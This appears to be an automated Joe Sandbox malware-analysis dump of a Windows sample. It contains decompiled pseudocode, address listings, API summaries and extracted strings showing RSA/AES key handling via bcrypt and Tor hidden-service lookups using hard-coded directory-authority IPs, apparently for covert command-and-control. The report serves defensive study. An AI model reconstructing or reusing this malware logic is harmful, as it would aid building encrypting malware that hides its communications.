                            														E0040664B( &_v1000, _t1044 + 0xa4, 0xf7);
                            														E004037B8(__eflags, _v460, _t1044 + 0xa4, 0xf7, 0);
                            														E004064D6( &_v460,  &_v460, 0, 1);
                            														E00403892(_t1017, _v12, _v484, _v476, 0, _t1044 + 5, 0, _v532);
                            														E00404484(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                            														_t962 = E004047B4(_v1896, _v1920, 0x404, _a12, 0x64);
                            														_t1045 = _v1920;
                            														__eflags = _t962;
                            														if(_t962 != 0) {
                            															goto L131;
                            														}
                            														__eflags =  *((char*)(_t1045 + 4)) - 3;
                            														if(__eflags != 0) {
                            															goto L133;
                            														}
                            														_t964 = E00403913(_t1017, __eflags, _v12, _v480, _v472, 0, _t1045 + 5, 1, _v528);
                            														__eflags = _t964;
                            														if(_t964 == 0) {
                            															goto L131;
                            														}
                            														__eflags =  *((intOrPtr*)(_t1045 + 5)) - 0x28;
                            														if(__eflags != 0) {
                            															goto L133;
                            														}
                            														_t966 = E00403913(_t1017, __eflags, _v12, _v512, _v504, 0, _t1045 + 0x207, 2, _v560);
                            														__eflags = _t966;
                            														if(_t966 == 0) {
                            															goto L131;
                            														}
                            														E00406605(_t1045 + 0x291,  &_v312, 0x80);
                            														_t976 = E004039AA(__eflags, _v8, _v12, _v20,  &_v456, _t1045 + 0x292,  &_v468,  &_v464,  &_v524,  &_v520);
                            														__eflags = _t976;
                            														if(_t976 == 0) {
                            															goto L131;
                            														}
                            														_t990 = 0xffffffff;
                            														goto L57;
                            													}
                            													__eflags = _t990;
                            													if(_t990 >= 0) {
                            														goto L133;
                            													}
                            													E004066D2(_v1924, 0x186a0);
                            													_t1038 = _v1924;
                            													 *_t1038 = 0x80;
                            													 *((char*)(_t1038 + 3)) = 1;
                            													 *((char*)(_t1038 + 4)) = 3;
                            													 *((char*)(_t1038 + 5)) = 1;
                            													 *((char*)(_t1038 + 9)) = _v28;
                            													 *((char*)(_t1038 + 0xf)) = 0x12;
                            													E004066E9(_a4, 0xa,  &_v1740);
                            													E004067E1( &_v1740, 0xa, _t1038 + 0x10);
                            													 *((char*)(_t1038 + 0x20)) = 0x3a;
                            													E004066E9(_a8, 0xffffffff,  &_v1828);
                            													 *((intOrPtr*)(_t1038 + 0xf)) =  *((intOrPtr*)(_t1038 + 0xf)) + E0040690B(__eflags,  &_v1828);
                            													E0040664B( &_v1828, _t1038 + 0x21, _t859);
                            													E00403892(_t1017, _v12, _v516, _v508, _v468, _t1038 + 5, 1, _v524);
                            													E00404484(__eflags, _v1896, _v1924, 0x202, 0, _a12);
                            													_t866 = E004047B4(_v1896, _v1920, 0x202, _a12, 0x64);
                            													_t1039 = _v1920;
                            													__eflags = _t866;
                            													if(_t866 != 0) {
                            														goto L131;
                            													}
                            													__eflags = _t1039[4] - 3;
                            													if(__eflags != 0) {
                            														goto L131;
                            													}
                            													_t868 = E00403913(_t1017, __eflags, _v12, _v512, _v504, _v464,  &(_t1039[5]), 3, _v520);
                            													__eflags = _t868;
                            													if(_t868 == 0) {
                            														goto L131;
                            													}
                            													__eflags = _t1039[5] - 4;
                            													if(_t1039[5] == 4) {
                            														E0040664B( &_v12, _a24, 4);
                            														E0040664B( &_v516, _a28, 0x10);
                            														E0040664B( &_v468, _a28 + 0x10, 8);
                            														E0040664B( &_v524, _a32, 8);
                            														E0040664B( &_v28, _a36, 4);
                            														_v1932 = 1;
                            													}
                            													goto L133;
                            												}
                            												__eflags = _v1816;
                            												if(_v1816 == 0) {
                            													continue;
                            												}
                            												goto L26;
                            											}
                            											__eflags = _t660 - 0x1f;
                            											if(__eflags != 0) {
                            												continue;
                            											}
                            											goto L23;
                            										}
                            										__eflags = _t660 - 0x17;
                            										if(_t660 != 0x17) {
                            											continue;
                            										}
                            										goto L21;
                            									}
                            									__eflags = _t660 - 7;
                            									if(_t660 != 7) {
                            										continue;
                            									}
                            									goto L19;
                            								}
                            								__eflags = _t660 - 7;
                            								if(_t660 != 7) {
                            									continue;
                            								}
                            								goto L17;
                            							}
                            							break;
                            						} else {
                            							continue;
                            						}
                            					}
                            				}
                            				L133:
                            				_v40 = 0xc;
                            				__eflags = _v1932 - 1;
                            				if(_v1932 != 1) {
                            					_v40 = 0xe;
                            				}
                            				E00406517( &_v572,  &_v572, 0, _v40);
                            				_v40 = 8;
                            				_v48 = 4;
                            				__eflags = _v1932 - 1;
                            				if(_v1932 != 1) {
                            					_v40 = 0xe;
                            					_v48 = 0;
                            				}
                            				E004064D6( &_v516,  &_v516, _v48, _v40);
                            				CryptReleaseContext(_v8, 0);
                            				__eflags = _v1932 - 1;
                            				if(_v1932 != 1) {
                            					_push(0);
                            					_push(_v12);
                            					 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            				}
                            				_push(0);
                            				_push(_v16);
                            				 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            				_push(0);
                            				_push(_v20);
                            				 *((intOrPtr*)(E00406EE2(__eflags, E00406DF2("bcrypt.dll"), "BCryptCloseAlgorithmProvider")))();
                            				E0040664B( &_v1896, _a20, 4);
                            				E004048E1( &_v576);
                            				E004048E1( &_v1928);
                            				E004048E1( &_v1920);
                            				E004048E1( &_v1924);
                            				return _v1932;
                            			}














































































































































































































                            0x00401168
                            0x0040117f
                            0x00401196
                            0x0040119b
                            0x0040119d
                            0x004011a5
                            0x004011a9
                            0x004011bf
                            0x004011c1
                            0x004011c3
                            0x004011cb
                            0x004011cf
                            0x004011e5
                            0x004011e7
                            0x004011e9
                            0x004011f1
                            0x004011f5
                            0x0040120b
                            0x0040120d
                            0x0040120f
                            0x00401217
                            0x0040121e
                            0x0040121f
                            0x00401237
                            0x00401239
                            0x00401243
                            0x0040124d
                            0x00401257
                            0x00401261
                            0x0040126b
                            0x00401275
                            0x0040127f
                            0x00401289
                            0x00401293
                            0x0040129d
                            0x004012a7
                            0x004012b1
                            0x004012bb
                            0x004012c5
                            0x004012cf
                            0x004012d9
                            0x004012e3
                            0x004012ed
                            0x004012f7
                            0x00401301
                            0x0040130b
                            0x00401315
                            0x0040131f
                            0x0040131f
                            0x0040131f
                            0x0040131f
                            0x00401325
                            0x00000000
                            0x00000000
                            0x0040132d
                            0x00401356
                            0x00401356
                            0x00401358
                            0x00000000
                            0x00000000
                            0x0040135a
                            0x0040136b
                            0x00401370
                            0x00401372
                            0x00000000
                            0x00401374
                            0x0040137f
                            0x0040138a
                            0x0040138f
                            0x00401399
                            0x004013a3
                            0x004013a9
                            0x004013ad
                            0x004013c0
                            0x004013c7
                            0x004013cc
                            0x004013cf
                            0x004013d1
                            0x004013d1
                            0x004013cf
                            0x004013d7
                            0x004013d8
                            0x004013d8
                            0x004013d8
                            0x004013e7
                            0x004013ee
                            0x00402644
                            0x00402644
                            0x0040264b
                            0x00000000
                            0x00000000
                            0x00401416
                            0x00401419
                            0x0040141e
                            0x00401425
                            0x00401430
                            0x00401430
                            0x00401437
                            0x00401442
                            0x00401442
                            0x00401449
                            0x00401454
                            0x00401454
                            0x0040145b
                            0x00401466
                            0x0040148d
                            0x00401492
                            0x00401492
                            0x00401494
                            0x00000000
                            0x00000000
                            0x0040149a
                            0x004014a1
                            0x004014b0
                            0x004014b0
                            0x004014b7
                            0x00401d72
                            0x00401d79
                            0x004022bd
                            0x004022c4
                            0x00402438
                            0x0040243f
                            0x00402621
                            0x00402621
                            0x00000000
                            0x00402621
                            0x00402463
                            0x00402465
                            0x00402629
                            0x00402635
                            0x0040263a
                            0x00000000
                            0x0040263a
                            0x0040247d
                            0x00402482
                            0x00402498
                            0x0040249d
                            0x0040249f
                            0x00000000
                            0x00000000
                            0x004024b1
                            0x004024b6
                            0x004024b8
                            0x00000000
                            0x00000000
                            0x004024be
                            0x004024c4
                            0x004024cb
                            0x004024d2
                            0x004024e5
                            0x004024f0
                            0x004024f1
                            0x004024f3
                            0x004024f5
                            0x004024fb
                            0x004024fc
                            0x004024fe
                            0x00402503
                            0x00402505
                            0x00000000
                            0x00000000
                            0x0040251b
                            0x00402520
                            0x00402522
                            0x00000000
                            0x00000000
                            0x00402528
                            0x0040252b
                            0x00402531
                            0x00402533
                            0x00402533
                            0x00402533
                            0x0040253c
                            0x00402541
                            0x00402548
                            0x00000000
                            0x00000000
                            0x0040254a
                            0x00402554
                            0x00402559
                            0x0040255c
                            0x00000000
                            0x00000000
                            0x00402567
                            0x00402570
                            0x00402573
                            0x00000000
                            0x0040261c
                            0x00402585
                            0x004025a8
                            0x004025aa
                            0x004025b3
                            0x004025b5
                            0x004025b7
                            0x004025c8
                            0x004025cd
                            0x004025d3
                            0x004025e4
                            0x004025e9
                            0x004025ef
                            0x004025f5
                            0x004025fa
                            0x004025fd
                            0x00402615
                            0x00000000
                            0x00402615
                            0x00000000
                            0x004024d2
                            0x00402328
                            0x0040232d
                            0x0040232f
                            0x00000000
                            0x00000000
                            0x00402340
                            0x00402345
                            0x0040234b
                            0x0040234e
                            0x00402352
                            0x00402356
                            0x0040235a
                            0x0040235e
                            0x00402378
                            0x00402378
                            0x0040237b
                            0x00000000
                            0x00000000
                            0x0040236f
                            0x00402377
                            0x00402377
                            0x00402377
                            0x0040238a
                            0x004023ac
                            0x004023c7
                            0x004023e2
                            0x004023e7
                            0x004023ed
                            0x004023ef
                            0x00000000
                            0x00000000
                            0x004023f5
                            0x004023f9
                            0x00000000
                            0x00000000
                            0x0040241c
                            0x00402421
                            0x00402423
                            0x00000000
                            0x00000000
                            0x00402429
                            0x0040242d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00402433
                            0x00401d7f
                            0x00401d86
                            0x00401d8d
                            0x004022a6
                            0x004022a6
                            0x004022aa
                            0x00000000
                            0x00000000
                            0x00401d9c
                            0x00401db9
                            0x00401dd5
                            0x00401dea
                            0x00401dfc
                            0x00401e0e
                            0x00401e13
                            0x00401ef9
                            0x00401ef9
                            0x00401efd
                            0x00000000
                            0x00000000
                            0x00401e24
                            0x00401e29
                            0x00401e5f
                            0x00401e64
                            0x00401e6b
                            0x00401e6d
                            0x00401ed7
                            0x00401ed7
                            0x00401edb
                            0x00401ef4
                            0x00401edd
                            0x00401ee0
                            0x00401ee5
                            0x00401ee5
                            0x00000000
                            0x00401edb
                            0x00401e83
                            0x00401ea1
                            0x00401ea6
                            0x00401ed2
                            0x00401ed2
                            0x00401ed5
                            0x00000000
                            0x00000000
                            0x00401eaa
                            0x00401eb2
                            0x00401eba
                            0x00000000
                            0x00401ed0
                            0x00401ebc
                            0x00401ec4
                            0x00401ec6
                            0x00401ec6
                            0x00401ecd
                            0x00401ecd
                            0x00000000
                            0x00401ed2
                            0x00401f03
                            0x00402299
                            0x00402299
                            0x0040229d
                            0x00000000
                            0x00000000
                            0x00401f18
                            0x00401f1d
                            0x00401f1e
                            0x00401f42
                            0x00401f44
                            0x00000000
                            0x00000000
                            0x00401fae
                            0x00401fb0
                            0x00402260
                            0x00402272
                            0x00402277
                            0x0040227a
                            0x0040227d
                            0x00402290
                            0x00402295
                            0x00402297
                            0x004022b5
                            0x00000000
                            0x004022b5
                            0x00000000
                            0x00402297
                            0x00401fc1
                            0x00401fc6
                            0x00401fcc
                            0x00401fd2
                            0x00401fd5
                            0x00401fd9
                            0x00401fe0
                            0x00402000
                            0x0040201b
                            0x00402036
                            0x0040203b
                            0x00402041
                            0x00402043
                            0x00000000
                            0x00000000
                            0x00402049
                            0x0040204d
                            0x00000000
                            0x00000000
                            0x00402070
                            0x00402075
                            0x00402077
                            0x00000000
                            0x00000000
                            0x0040207d
                            0x00402081
                            0x00000000
                            0x00000000
                            0x00402092
                            0x00402097
                            0x0040209d
                            0x004020a3
                            0x004020a6
                            0x004020aa
                            0x004020b1
                            0x004020ca
                            0x004020cf
                            0x004020d2
                            0x004020d2
                            0x004020d4
                            0x004020f4
                            0x0040210f
                            0x00402114
                            0x0040211b
                            0x00402122
                            0x00402129
                            0x0040212f
                            0x00402140
                            0x00402145
                            0x00402158
                            0x00402163
                            0x00402164
                            0x00402166
                            0x00402168
                            0x0040216e
                            0x0040216f
                            0x00402171
                            0x00402176
                            0x00402178
                            0x00000000
                            0x00000000
                            0x0040217e
                            0x00402180
                            0x00000000
                            0x00000000
                            0x00402196
                            0x0040219b
                            0x0040219d
                            0x00000000
                            0x00000000
                            0x004021a9
                            0x004021ac
                            0x004021af
                            0x004021b6
                            0x00000000
                            0x00000000
                            0x004021c4
                            0x004021d0
                            0x004021d5
                            0x004021df
                            0x004021e1
                            0x004021e1
                            0x004021e3
                            0x00000000
                            0x00000000
                            0x004021e9
                            0x00402255
                            0x00402255
                            0x00402259
                            0x00000000
                            0x00000000
                            0x004021f6
                            0x004021f8
                            0x0040224c
                            0x0040224c
                            0x00402252
                            0x00402252
                            0x00402252
                            0x00000000
                            0x00402252
                            0x00402218
                            0x0040221d
                            0x0040221f
                            0x00000000
                            0x00000000
                            0x00402225
                            0x0040222b
                            0x00000000
                            0x00000000
                            0x0040222d
                            0x00402233
                            0x00000000
                            0x00000000
                            0x00402239
                            0x00402242
                            0x00402247
                            0x00402249
                            0x00402249
                            0x00402249
                            0x00000000
                            0x00402249
                            0x0040225b
                            0x00000000
                            0x00402145
                            0x004022a3
                            0x004022a3
                            0x004022a3
                            0x004022a3
                            0x00000000
                            0x004022b0
                            0x004014d2
                            0x004014d5
                            0x004014d8
                            0x004014eb
                            0x004014eb
                            0x004014ef
                            0x00000000
                            0x00000000
                            0x004014e2
                            0x004014e3
                            0x004014e5
                            0x004014e7
                            0x004014e7
                            0x004014e8
                            0x004014e8
                            0x004014e8
                            0x004014e8
                            0x004014f1
                            0x00401508
                            0x00401517
                            0x0040151c
                            0x0040151e
                            0x00000000
                            0x00000000
                            0x0040153c
                            0x00401541
                            0x00401547
                            0x004015fd
                            0x004015fd
                            0x00401600
                            0x00000000
                            0x00000000
                            0x00401602
                            0x00401606
                            0x0040155c
                            0x0040155c
                            0x0040155e
                            0x00000000
                            0x00000000
                            0x00401564
                            0x00401574
                            0x00401579
                            0x0040157b
                            0x00000000
                            0x00000000
                            0x00401581
                            0x00401591
                            0x00401596
                            0x00401598
                            0x00000000
                            0x00000000
                            0x0040159e
                            0x004015ae
                            0x004015b3
                            0x004015b5
                            0x00000000
                            0x00000000
                            0x004015bc
                            0x004015be
                            0x004015c0
                            0x004015cc
                            0x004015d1
                            0x004015d3
                            0x00000000
                            0x00000000
                            0x004015dc
                            0x004015ec
                            0x004015f1
                            0x004015f3
                            0x00000000
                            0x00000000
                            0x004015f9
                            0x004015fc
                            0x004015fc
                            0x00000000
                            0x004015fc
                            0x00000000
                            0x00401606
                            0x00401bc7
                            0x00401bc7
                            0x00401bca
                            0x00000000
                            0x00000000
                            0x00401611
                            0x00401674
                            0x00401679
                            0x0040167b
                            0x00401bad
                            0x00401bbf
                            0x00401bc4
                            0x00401bc4
                            0x00401bc4
                            0x00000000
                            0x00401bc4
                            0x004016a2
                            0x004016a7
                            0x004016a8
                            0x004016aa
                            0x004016b1
                            0x004016b7
                            0x004016bc
                            0x004016c8
                            0x004016cd
                            0x004016d3
                            0x004016ed
                            0x0040170b
                            0x0040172a
                            0x0040172f
                            0x00401731
                            0x00000000
                            0x00000000
                            0x00401737
                            0x0040173d
                            0x00401753
                            0x00401758
                            0x0040175f
                            0x00401766
                            0x0040176f
                            0x00401779
                            0x00401783
                            0x004017b3
                            0x004017b8
                            0x004017b9
                            0x004017c7
                            0x004017cc
                            0x004017e4
                            0x004017f0
                            0x004017f6
                            0x00401800
                            0x00401800
                            0x00401800
                            0x00401802
                            0x00000000
                            0x00000000
                            0x004017fa
                            0x004017fb
                            0x004017fd
                            0x004017ff
                            0x004017ff
                            0x004017fd
                            0x00401804
                            0x0040181c
                            0x0040183b
                            0x00401840
                            0x00401853
                            0x0040185b
                            0x00401862
                            0x00401863
                            0x00401865
                            0x00401870
                            0x00401871
                            0x00401873
                            0x00401875
                            0x0040187a
                            0x00401884
                            0x0040188e
                            0x00401898
                            0x004018a2
                            0x004018ac
                            0x004018bc
                            0x004018be
                            0x004018d7
                            0x004018dc
                            0x004018de
                            0x004018e9
                            0x004018f0
                            0x004018f7
                            0x004018f8
                            0x004018fa
                            0x00401912
                            0x0040191f
                            0x00401924
                            0x0040192a
                            0x00401930
                            0x00401933
                            0x00401937
                            0x00401940
                            0x00401943
                            0x0040195d
                            0x00401968
                            0x0040196e
                            0x00401978
                            0x00401982
                            0x00401987
                            0x00401988
                            0x00401990
                            0x00401991
                            0x00401993
                            0x0040199b
                            0x0040199c
                            0x004019a4
                            0x004019a5
                            0x004019c0
                            0x004019cd
                            0x004019d2
                            0x004019dc
                            0x004019e6
                            0x00401a00
                            0x00401a05
                            0x00401a07
                            0x00401a0f
                            0x00401a10
                            0x00401a12
                            0x00401a1a
                            0x00401a21
                            0x00401a22
                            0x00401a24
                            0x00401a3c
                            0x00401a51
                            0x00401a6a
                            0x00401a7a
                            0x00401a9c
                            0x00401ab7
                            0x00401ad2
                            0x00401ad7
                            0x00401add
                            0x00401adf
                            0x00000000
                            0x00000000
                            0x00401ae5
                            0x00401ae9
                            0x00000000
                            0x00000000
                            0x00401b0c
                            0x00401b11
                            0x00401b13
                            0x00000000
                            0x00000000
                            0x00401b19
                            0x00401b1d
                            0x00000000
                            0x00000000
                            0x00401b43
                            0x00401b48
                            0x00401b4a
                            0x00000000
                            0x00000000
                            0x00401b63
                            0x00401b9b
                            0x00401ba0
                            0x00401ba2
                            0x00000000
                            0x00000000
                            0x00401ba8
                            0x00000000
                            0x00401ba8
                            0x00401bd0
                            0x00401bd2
                            0x00000000
                            0x00000000
                            0x00401be3
                            0x00401be8
                            0x00401bee
                            0x00401bf1
                            0x00401bf5
                            0x00401bf9
                            0x00401c00
                            0x00401c03
                            0x00401c13
                            0x00401c25
                            0x00401c2a
                            0x00401c3a
                            0x00401c4b
                            0x00401c5a
                            0x00401c80
                            0x00401c9b
                            0x00401cb6
                            0x00401cbb
                            0x00401cc1
                            0x00401cc3
                            0x00000000
                            0x00000000
                            0x00401cc9
                            0x00401ccd
                            0x00000000
                            0x00000000
                            0x00401cf4
                            0x00401cf9
                            0x00401cfb
                            0x00000000
                            0x00000000
                            0x00401d01
                            0x00401d05
                            0x00401d14
                            0x00401d28
                            0x00401d3a
                            0x00401d4b
                            0x00401d59
                            0x00401d5e
                            0x00401d5e
                            0x00000000
                            0x00401d05
                            0x004014a3
                            0x004014aa
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004014aa
                            0x0040145d
                            0x00401460
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00401460
                            0x0040144b
                            0x0040144e
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040144e
                            0x00401439
                            0x0040143c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040143c
                            0x00401427
                            0x0040142a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0040142a
                            0x00000000
                            0x004013e9
                            0x00000000
                            0x004013e9
                            0x004013e7
                            0x00401372
                            0x00402651
                            0x00402651
                            0x00402658
                            0x0040265f
                            0x00402661
                            0x00402661
                            0x00402674
                            0x00402679
                            0x00402680
                            0x00402687
                            0x0040268e
                            0x00402690
                            0x00402697
                            0x00402697
                            0x004026ab
                            0x004026b5
                            0x004026ba
                            0x004026c1
                            0x004026c3
                            0x004026c5
                            0x004026dd
                            0x004026dd
                            0x004026df
                            0x004026e1
                            0x004026f9
                            0x004026fb
                            0x004026fd
                            0x00402715
                            0x00402723
                            0x0040272f
                            0x0040273b
                            0x00402747
                            0x00402753
                            0x00402762

                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider,0000000D,F0000000,?,?,?,?,?), ref: 00401196
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,00000000,?), ref: 004026B5
                              • Part of subcall function 00402A45: wsprintfA.USER32 ref: 00402A94
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00401508
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040153C
                            • inet_addr.WSOCK32(?,00000100,?,00000400,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004016B7
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004016ED
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040170B
                              • Part of subcall function 00404065: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040415E
                              • Part of subcall function 00404065: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040417C
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 0040181C
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040183B
                            • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,?), ref: 00401875
                              • Part of subcall function 004047B4: select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?,?), ref: 004047F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.244946144.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$Context$AcquireDecodeObjectReleaseinet_addrselectwsprintf
                            • String ID: -----BEGIN MESSAGE-----$-----END$-----END MESSAGE-----$/tor/status-vote/current/consensus$128.31.0.34$128.31.0.39$131.188.40.189$154.35.175.225$171.25.193.9$193.23.244.244$194.109.206.212$199.58.81.140$204.13.164.118$86.59.21.38$AES$BCryptCloseAlgorithmProvider$BCryptEncrypt$BCryptImportKey$BCryptImportKeyPair$BCryptOpenAlgorithmProvider$BCryptSetProperty$ChainingMode$ChainingModeECB$GET /tor/rendezvous2/%s HTTP/1.0Host: %sConnection: close$KDBM$KEY-----$KeyDataBlob$Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider$P$P$P$P$P$P$P$RSA$RSAPUBLICBLOB$SHA1$bcrypt.dll$directory-footer$introduction-point$ip-address$onion-port$service-key
                            • API String ID: 1114855807-1473801416
                            • Opcode ID: c0441410ec6860015ef4cb2d2b6026077441e37c211349f0a697a63636d42b28
                            • Instruction ID: 53cf533059f84ec67261bff70377a729e3e71cee1c49a3e671a678b83a82c01b
                            • Opcode Fuzzy Hash: c0441410ec6860015ef4cb2d2b6026077441e37c211349f0a697a63636d42b28
                            • Instruction Fuzzy Hash: D4D27E71D40219AADF219B90CD45FDEB779AB08304F1040EAF608B60D1DB7AAEA49F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00671758
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0067178C
                            • inet_addr.WS2_32(?), ref: 00671907
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0067193D
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,00000000,00000000,00000000), ref: 0067195B
                              • Part of subcall function 006742B5: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 006743CC
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00671A6C
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 00671A8B
                            • CryptDecodeObject.CRYPT32(00000001,00000013,?,0000008C,00000000,?,00000094), ref: 00671AC5
                              • Part of subcall function 00674A04: select.WS2_32(00000000,?,00000000,00000000,?), ref: 00674A41
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000,0000000E,?,00000000,0000000C), ref: 00672905
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.245054120.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00670000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_p9CvI6kq7d.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$BinaryString$ContextDecodeObjectReleaseinet_addrselect
                            • String ID: AES$ChainingMode$ChainingModeECB$KeyDataBlob$P$P$P$P$P$P$P$RSA$RSA1$RSAPUBLICBLOB$SHA1
                            • API String ID: 1993778655-3242379580
                            • Opcode ID: 444bd495383bb66d9f033cdaf250c720b1adf006b13f8ea2e0fc212d6713849a
                            • Instruction ID: 1fae666b16c20f6d0c15cf226bf46be674b20188482c09c720ee1b8c55ace58f
                            • Opcode Fuzzy Hash: 444bd495383bb66d9f033cdaf250c720b1adf006b13f8ea2e0fc212d6713849a
                            • Instruction Fuzzy Hash: 72D27C71D44219AADF219BA0CC45FEEB77AFB08300F1080E9F60CB6191DB76AE949F55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E00403B56(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
                            				char _v16;
                            				char _v516;
                            				char _v568;
                            				intOrPtr _v572;
                            				int _v576;
                            				int _v580;
                            				intOrPtr _v584;
                            				intOrPtr _v588;
                            				intOrPtr _v592;
                            				char _v596;
                            				char _v597;
                            				intOrPtr _v728;
                            				char _v732;
                            				intOrPtr _v736;
                            				int _v740;
                            				char _v744;
                            				char _v884;
                            				char _v942;
                            				char _v1012;
                            				char _v1028;
                            				int _v1032;
                            				char _v1040;
                            				char _v1044;
                            				int _v1052;
                            				int _v1056;
                            				char* _v1060;
                            				void* _t72;
                            				void* _t126;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t130 = __eflags;
                            				E004066D2( &_v1060,  &_v16 - _t129);
                            				if(E0040690B(_t130, _a12) == 0x20) {
                            					_v1032 = E0040685B(_a12,  &_v516);
                            				} else {
                            					CryptStringToBinaryA(_a12, 0, 1, 0,  &_v1032, 0, 0);
                            					CryptStringToBinaryA(_a12, 0, 1,  &_v516,  &_v1032, 0, 0);
                            				}
                            				_t132 = _a36 - 1;
                            				if(_a36 == 1) {
                            					_t123 = _a32;
                            					E0040664B( &_v516, _a32 + 0xba, _v1032);
                            				}
                            				_t72 = E00404065(_t123, _t132, _a4, _a8,  &_v516,  &_v884);
                            				if(_t72 != 0) {
                            					_t72 = E00403E30(_a20, _a16,  &_v1012);
                            					_t134 = _t72;
                            					if(_t72 != 0) {
                            						E00406A32(_t72, 0x100);
                            						asm("stosb");
                            						asm("loop 0xfffffff5");
                            						_v1044 = 0x94;
                            						_push( &_v1044);
                            						_push( &_v744);
                            						_push(0);
                            						_push(0x8c);
                            						_push( &_v884);
                            						_push(0x13);
                            						_push(1);
                            						L00407208();
                            						_v596 = 0x31415352;
                            						_v592 = 0x400;
                            						_v588 = 4;
                            						_v584 = 0x80;
                            						_v580 = 0;
                            						_v576 = 0;
                            						asm("bswap eax");
                            						_v572 = _v728;
                            						E00406605( &_v597,  &_v568, 0x80);
                            						_push(0);
                            						_push(0x9c);
                            						_push( &_v596);
                            						_push( &_v1040);
                            						_push(L"RSAPUBLICBLOB");
                            						_push(0);
                            						_push(_a24);
                            						 *((intOrPtr*)(E00406EE2(_t134, E00406DF2("bcrypt.dll"), "BCryptImportKeyPair")))();
                            						_v1060 = L"SHA1";
                            						_v1056 = 0;
                            						_v1052 = 0;
                            						_push(4);
                            						_push( &_v1044);
                            						_push(0x80);
                            						_push(_a32);
                            						_push(0);
                            						_push(0);
                            						_push( &_v1060);
                            						_push(0x56);
                            						_push( &_v1028);
                            						_push(_v1040);
                            						 *((intOrPtr*)(E00406EE2(_t134, E00406DF2("bcrypt.dll"), "BCryptEncrypt")))();
                            						E004064D6( &_v1040,  &_v1040, 0, 1);
                            						_t126 = _a32 + _v1044;
                            						_v744 = 0x4d42444b;
                            						_v740 = 1;
                            						_v736 = 0x10;
                            						E0040664B( &_v1028,  &_v732, 0x10);
                            						_push(0);
                            						_push(0x1c);
                            						_push( &_v744);
                            						_push(0);
                            						_push(0);
                            						_push( &_v1040);
                            						_push(L"KeyDataBlob");
                            						_push(0);
                            						_push(_a28);
                            						 *((intOrPtr*)(E00406EE2(_t134, E00406DF2("bcrypt.dll"), "BCryptImportKey")))();
                            						E0040664B( &_v942, _t126, 0x3a);
                            						E004037B8(_t134, _v1040, _t126, 0x3a, 0);
                            						E004064D6( &_v1040,  &_v1040, 0, 1);
                            						return _t126 + 0x3a - _a32;
                            					}
                            				}
                            				return _t72;
                            			}

































                            0x00403b56
                            0x00403b6d
                            0x00403b7d
                            0x00403bc7
                            0x00403b7f
                            0x00403b93
                            0x00403bb1
                            0x00403bb1
                            0x00403bcd
                            0x00403bd1
                            0x00403bd3
                            0x00403bea
                            0x00403bea
                            0x00403c03
                            0x00403c0a
                            0x00403c1d
                            0x00403c22
                            0x00403c24
                            0x00403c3a
                            0x00403c3f
                            0x00403c40
                            0x00403c42
                            0x00403c52
                            0x00403c59
                            0x00403c5a
                            0x00403c5c
                            0x00403c67
                            0x00403c68
                            0x00403c6a
                            0x00403c6c
                            0x00403c71
                            0x00403c7b
                            0x00403c85
                            0x00403c8f
                            0x00403c99
                            0x00403ca3
                            0x00403cb3
                            0x00403cb5
                            0x00403cce
                            0x00403cd3
                            0x00403cd5
                            0x00403ce0
